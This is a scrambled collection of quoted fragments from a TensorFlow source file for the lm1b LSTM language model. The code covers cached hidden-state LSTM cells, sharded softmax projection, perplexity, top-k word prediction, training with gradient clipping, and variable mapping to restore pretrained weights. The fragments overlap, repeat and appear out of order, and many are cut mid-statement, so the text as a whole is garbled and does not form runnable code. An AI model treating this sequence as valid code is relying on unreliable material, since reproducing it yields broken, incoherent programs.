num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\",", "ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return out_0, state_0", "hparams: :return: lstm output and state \"\"\" # LSTM with cached / preserved", "def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull out the most likely", "cell_out_all_layers = [] for layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out,", "\"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients =", "= \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict", "of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings =", "< x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients =", "out the most likely words :param logits: :param id_to_word_lookup_table: :param k: :param hparams:", "hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax =", "character encoded words :param hparams: :return: dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE):", "tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return", "GPU support to trainer # todo: reset lstm hidden state for inference #", "progress... :param loss: :param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables()", "id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull out the most likely words :param", "tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return", "word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def", "tensor of character encoded words :param hparams: :return: dict of inference nodes \"\"\"", "match.group( 2).upper() + \"_diag\", } for r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda", "num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits =", "see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings :param hparams: :return:", "= word_embeddings cell_state_all_layers = [] cell_out_all_layers = [] for layer_num in range(0, 2):", ":param hparams: :return: lstm output and state \"\"\" # LSTM with cached /", "\"\"\" :param logits: :param targets: :param target_weights: :param hparams: :return: \"\"\" target_list =", "tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy}", "return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\":", "hparams=None): \"\"\" Predict next word for each sequence / timestep in input_seqs :param", "word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss,", "(x.op.name, x), char_embedding_vars))) # Map lstm embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX", "hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op", "tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False)", ":return: dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams)", "todo: reset lstm hidden state for inference # todo: cleanup batch_sizing inconsistencies import", "= cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with", "= merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map lstm embedding vars var_map_regexes", "= [] cell_out_all_layers = [] for layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX +", "/ timestep in input_seqs :param input_seqs: tensor of character encoded words :param hparams:", "layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams)", "lstm_vars, softmax_vars): var_map = {} # Map char embedding vars var_map = merge(var_map,", "lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with", "/ word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\"", "ass_h]): out_0 = tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM", "tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX =", "global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to restore the pre-trained model", "2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs", "id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids =", "char embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map", "NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached / preserved hidden", "/ preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word", "logits: :param targets: :param target_weights: :param hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1])", "Attach nodes for training. Work in progress... :param loss: :param hparams: :return: \"\"\"", "word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return", "hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False)", "= tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738)", "= tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax def", "vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map lstm embedding", "Work in progress... :param loss: :param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES,", "lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return", "shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w =", "re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model", "softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits: :param targets: :param target_weights:", "use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\",", "= char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers", "\"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\":", "all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer", "hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c,", "tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs to sparse", "= tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c,", "of word embeddings :param hparams: :return: lstm output and state \"\"\" # LSTM", "= tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return {", "all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients", "v # Map softmax embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x),", "sparse vectors / word predictions :param input: lstm outputs :param hparams: :return: tensor", "+ str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1,", "https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings :param hparams: :return: lstm output and", "tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out =", "{r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\"", "state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings :param hparams:", "match.group(1) + \"/W_\" + match.group( 2).upper() + \"_diag\", } for r_match, r_replace in", "hparams=None): \"\"\" LSTM with cached / preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns", "target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list),", "to trainer # todo: reset lstm hidden state for inference # todo: cleanup", "{\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training. Work", "} for r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars)", "def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs to sparse vectors / word predictions", "hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids,", "x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v # Map", "all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op =", "out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs to sparse vectors /", "name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step} def", "hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars)", "cached / preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of", "lm1b.utils.util import merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input,", "word for each sequence / timestep in input_seqs :param input_seqs: tensor of character", "hparams=None): \"\"\" Helper to pull out the most likely words :param logits: :param", "graph :param sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map =", "= set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate)", "= \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for", "word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training. Work in", "r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" + match.group( 2).upper()", "with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out", "to restore the pre-trained model to the current graph :param sess: :param run_config:", "+ \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX +", "non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars),", "return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training.", "tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients)", "to the current graph :param sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars,", "\"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to", "# hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy,", "for inference # todo: cleanup batch_sizing inconsistencies import tensorflow as tf import re", "training. Work in progress... :param loss: :param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables()", "= tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\":", "in input_seqs :param input_seqs: tensor of character encoded words :param hparams: :return: dict", "in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state)", "str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size))", "target_weights: :param hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1]))", "\"/W_\" + match.group( 2).upper() + \"_diag\", } for r_match, r_replace in var_map_regexes.items(): matching_variables", "\"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits,", "r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\"", "v.name)] = v # Map softmax embedding vars var_map = merge(var_map, dict(map(lambda x:", "words :param hparams: :return: dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings =", "\"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for each", "= v # Map softmax embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name,", "with tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\"", ":param input_seqs: tensor of character encoded words :param hparams: :return: dict of inference", "_attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs to sparse vectors / word predictions :param", "var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map lstm embedding vars", "global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0,", "state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size", ":param targets: :param target_weights: :param hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list", "cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE):", "def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to restore the pre-trained model to", "def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} # Map char embedding vars var_map", "softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax =", "tensor of word embeddings :param hparams: :return: lstm output and state \"\"\" #", "cleanup batch_sizing inconsistencies import tensorflow as tf import re import os import lm1b.model.char_embedding_nodes", "= tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step',", "with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs =", "r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\",", "v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v # Map softmax embedding vars", "import merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None):", "= top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k}", "vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX +", "# https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c", "input: lstm outputs :param hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size", "= tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size", "state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return out_0,", "\"\"\" Helper to pull out the most likely words :param logits: :param id_to_word_lookup_table:", "lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def", "hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax,", "sharded_linear, create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached /", "mapping shenanigans to restore the pre-trained model to the current graph :param sess:", "vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map var_map =", "var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) ) saver =", "tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\"", "return out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs to sparse vectors", "cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers = [] for layer_num in range(0,", "+ LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1)", "= tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits:", "tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits,", "num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = []", "[] cell_out_all_layers = [] for layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)):", "# todo: reset lstm hidden state for inference # todo: cleanup batch_sizing inconsistencies", "tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input,", "= _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits,", "run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} # Map char", "+ LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" +", "\"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1,", "shenanigans to restore the pre-trained model to the current graph :param sess: :param", "tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\":", "\"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5,", "softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w,", "\"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} # Map char embedding vars", "+ match.group( 2).upper() + \"_diag\", } for r_match, r_replace in var_map_regexes.items(): matching_variables =", "word_embeddings cell_state_all_layers = [] cell_out_all_layers = [] for layer_num in range(0, 2): with", "char_embedding_vars))) # Map lstm embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\":", "Map lstm embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\"", "r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" + match.group(", "hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights))", "= {} # Map char embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name,", "x: re.match(r_match, x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v", "dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map lstm embedding vars var_map_regexes = {r\"^(\"", "1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0])", "= 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached / preserved hidden state", "state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1])", "return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\"", "var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) ) saver = tf.train.Saver(var_list=var_map)", "for layer_num in range(0, 2): with 